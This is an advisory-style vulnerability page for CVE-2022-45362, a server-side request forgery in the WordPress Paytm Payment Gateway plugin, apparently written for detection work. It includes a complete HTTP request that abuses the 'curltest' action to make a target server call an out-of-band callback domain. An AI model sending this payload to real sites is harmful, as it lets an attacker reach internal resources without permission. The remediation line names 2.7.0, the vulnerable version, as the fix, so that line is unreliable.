🔙 목록으로 돌아가기

CVE-2022-45362: WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery

TitleWordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery
Authortheamanrawat
SeverityMedium
ImpactUnauthenticated attackers can exploit server-side request forgery through the url parameter in the curltest action to make arbitrary HTTP requests from the server, potentially accessing internal network resources and sensitive data.
RemediationUpdate to the latest version of the WordPress Paytm Payment Gateway plugin (2.7.0) or apply the vendor-supplied patch.
CVSS Score6.5
EPSS Score0.16747
CVE IDCVE-2022-45362
CWE IDCWE-918
Tags cve cve2022 ssrf wordpress wp-plugin wp paytm-payments unauth oast paytm vuln

🔍 Vulnerability Description

WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /?paytm_action=curltest&url=d5jn0hhle0o2886llbjgixhrhd1ukej49.oast.site HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-45362.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-45362.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A